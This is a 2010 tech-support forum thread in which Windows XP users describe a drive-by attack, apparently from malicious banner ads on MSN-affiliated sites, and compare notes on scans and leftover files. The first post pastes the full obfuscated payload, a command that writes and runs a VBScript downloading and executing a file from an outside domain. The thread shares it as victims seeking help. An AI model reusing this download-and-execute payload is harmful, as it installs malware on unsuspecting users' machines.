Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

TIVTCV Avisynth program error message then possible information sent to website?


  • Please log in to reply
6 replies to this topic

#1 qtaqq

qtaqq

  • Members
  • 101 posts
  • OFFLINE
  •  
  • Local time:07:38 AM

Posted 30 September 2010 - 02:32 AM

The TIVTCV v1.0.5 for Avisynth 2.5 x encounterd a problem on my machine. Before I even clicked send error report the Help and Support Center for windows XP opened by itself and seemed to be running code to send information up to a website. This computer is running Windows XP 64bit. I had just finished running a Panda Scan minutes before to check my system. I have included a screen shot of the error message and you can see the Help and Support Window open in the background.

Posted Image

I copied the text from the Help and Support window into a text file, to me it seems like it was trying to report some key from the C drive to the website, I have placed X's in some of the numbers of the value incase it is a Windows XP key or something like that.

Computer Information for \\Run('cmd%20/c%20echo%20FileName%20!%20@}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo%20url!@http://predisruption.com/sell/exe.php-exp!HCP]key!78XXXX60b0135f567e2b3XXXXXXXXXX@%20>>}TEMP}/go.vbs]]echo%20Set%20objHTTP%20!%20CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo%20Call%20objHTTP.Open(@GET@,%20url,%20False)>>}TEMP}/go.vbs]]echo%20objHTTP.Send>>}TEMP}/go.vbs]]echo%20set%20oStream%20!%20createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo%20Const%20adTypeBinary%20!%201%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateOverWrite%20!%202%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateNotExist%20!%201%20%20>>}TEMP}/go.vbs]]echo%20oStream.type%20!%20adTypeBinary>>}TEMP}/go.vbs]]echo%20oStream.open>>}TEMP}/go.vbs]]echo%20oStream.write%20objHTTP.responseBody>>}TEMP}/go.vbs]]echo%20oStream.savetofile%20FileName,%20adSaveCreateNotExist>>}TEMP}/go.vbs]]echo%20oStream.close>>}TEMP}/go.vbs]]echo%20set%20oStream%20!%20nothing>>}TEMP}/go.vbs]]echo%20Set%20xml%20!%20Nothing>>}TEMP}/go.vbs]]echo%20Set%20WshShell%20!%20CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo%20WshShell.Run%20FileName,%200,%20True>>}TEMP}/go.vbs]]echo%20Set%20FSO%20!%20CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo%20FSO.DeleteFile%20@}TEMP}/go.vbs@%20>>}TEMP}/go.vbs|cscript%20}TEMP}/go.vbs>nul'.replace(/!/g,%20String.fromCharCode(61)).replace(/@/g,%20String.fromCharCode(34)).replace(/]/g,%20String.fromCharCode(38)).replace(/{/g,%20String.fromCharCode(63)).replace(/}/g,%20String.fromCharCode(37)).replace(/-/g,%20String.fromCharCode(63)));

The website it appears to be trying to send this information to looks like it was registered on Sept. 25 2010.
http://webcache.googleusercontent.com/sear...=clnk&gl=us

edit: I did some quick checking, predisruption.com was created 9-24-10 registered by todayinc.com
http://www.whois.net/whois/predisruption.com
todayinc.com was registered by godaddy.com
http://www.whois.net/whois/todayinc.com
I'm not sure if this is really anything but I wonder why the Help and Support window opened by itself and seemed to report some value to them though.
end edit

I have run Panda Scan, MalwareBytes, SuperAntiSpyware but none have detected anything suspicious on my main operating system drive. I am currently running a TrendMicro scan to see if it finds any files.

Edited by qtaqq, 30 September 2010 - 02:42 AM.


BC AdBot (Login to Remove)

 


#2 qtaqq

qtaqq
  • Topic Starter

  • Members
  • 101 posts
  • OFFLINE
  •  
  • Local time:07:38 AM

Posted 30 September 2010 - 05:46 AM

I finished the TrendMicro scan and that did not find anything either.

#3 infectedbycnbc

infectedbycnbc

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:38 AM

Posted 01 October 2010 - 03:57 AM

I had something very similar happen to me on the same day you posted this.

Were you browsing an MSNBC-owned website at the time? (It looks like it from your screenshot.) I think some of the banner ads on their websites have been infected in the last week. There's a discussion about infected banner ads on their Newsvine site here:
http://blearc.newsvine.com/_news/2010/09/2...ans-on-newsvine

In those infections, instead of trying to connect to predisruption.com, the infected computers tried to connect to multiperforated.com. Both predisruption.com and multiperforated.com were registered by the same (presumably fake) Phil R. Gross just a week ago:
http://social.answers.microsoft.com/Forums...17-5ec723ad0393

In my case, instead of the Help and Support window opening by itself, Windows Media Player did and tried to load something from predisruption.com. I couldn't close the Windows Media Player window or the browser window, so I killed both off in the Task Manager.

This happened at 9:04 pm while I was browsing cnbc.com using Firefox 3.6.10. I don't think a webpage is usually supposed to be able to open a Windows Media Player window that way, completely outside the browser. For that to happen, I usually have to click on a link to a file.

The thing also left behind a 51k pdf file in my Local Settings\Temp\plugtmp-5 directory, but I don't think it was successful in opening it. I've scanned my system with both Malwarebytes and Norton, and neither detects any infection, even in that 51k pdf file. Unfortunately, that just makes me doubt Malwarebytes and Norton. So like you, I still have an uneasy feeling that something may have gotten deeper into my computer.

Good luck, and please post whether I'm right that you were browsing an MSNBC-connected website.

#4 qtaqq

qtaqq
  • Topic Starter

  • Members
  • 101 posts
  • OFFLINE
  •  
  • Local time:07:38 AM

Posted 06 October 2010 - 02:01 AM

Sorry for the delay I haven't been on the computer much sense I posted.

Thanks for replying. Yes I was browsing a msn site at the time it happened. I was reading a story on house squatting legality on the msn realestate site. I looked at my time stamp for the last visit to the site, it was at 8:57 pm central time. I was not clicking on anything either just reading the text on the site when that error popped up and then the help and support window came up all by itself. I also ran adaware and it found nothing on my C: drive except some cookies. It does make me feel uneasy too, I wonder if there is still something "new" on my machine that anti-virus people still don't know about or are currently studying. From the commands it ran in the help and support window it looked to me like it was taking that Windows key or some value, copying it to a temporary file, uploading it to that website and then trying to go back and delete that temporary file it created.

Thanks again for replying and it is odd how these events occured around the same time and at MSNBC sites.

#5 infectedbycnbc

infectedbycnbc

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:38 AM

Posted 06 October 2010 - 06:26 PM

Here's another victim, this time at Hotmail, another MSNBC-affiliated site:
http://social.msdn.microsoft.com/Forums/en...7d-9012544af62b

He posted what looks like the same virus code as you did.

MALVERTISING -- I just learned this term. It's when virus writers buy ad space on legitimate websites. Google the word malvertising to learn more about it. They say it has become much more common in the last year or two. Great. So now, even the most trustworthy websites can end up sending you a virus. That's what amazes me about this. Every day when I Google something, I click the links and blindly go to hundreds of sites I've never heard of before. And yet over the years, I've only been infected or had this close a call a few times. Very few. It's hard to believe that one of those very few times would be on a reputable website like CNBC, MSN, or Hotmail.

Edited by infectedbycnbc, 06 October 2010 - 06:41 PM.


#6 qtaqq

qtaqq
  • Topic Starter

  • Members
  • 101 posts
  • OFFLINE
  •  
  • Local time:07:38 AM

Posted 20 October 2010 - 07:37 AM

I was wondering how you were able to find the pdf file that was created? Was the name of the file in the commands it was trying to run? With this Malvertising, as you said, it seems that no sites are really safe now. The only way to be safe is that if companies screen the advertising space people buy, and make sure you have fully updated applications like java and adobe and a good antivirus program.

#7 infectedbycnbc

infectedbycnbc

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:38 AM

Posted 22 October 2010 - 01:54 AM

The Local Settings\Temp directory tends to accumulate junk, so I check it periodically and clear it out. I think some plug-ins that run under Firefox use it, like maybe Adobe's Flash player. They'll create a subdirectory named plugtmp-1, or plugtmp-2 if there's already a plugtmp-1 there, and so on. In this case, it got up to plugtmp-5.

When Firefox crashes or is killed off like I did, those temporary subdirectories get left there. So in looking around afterwards, I noticed this plugtmp-5 directory with a pdf file in it, and the date/time created was the exact minute when I got hit. (Also, I hadn't been looking at any pdf files and there weren't any links to pdf files on the pages I was browsing.)

I'm using Windows XP. I don't know if the Temp directory is still in the same place under Vista and Windows 7.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users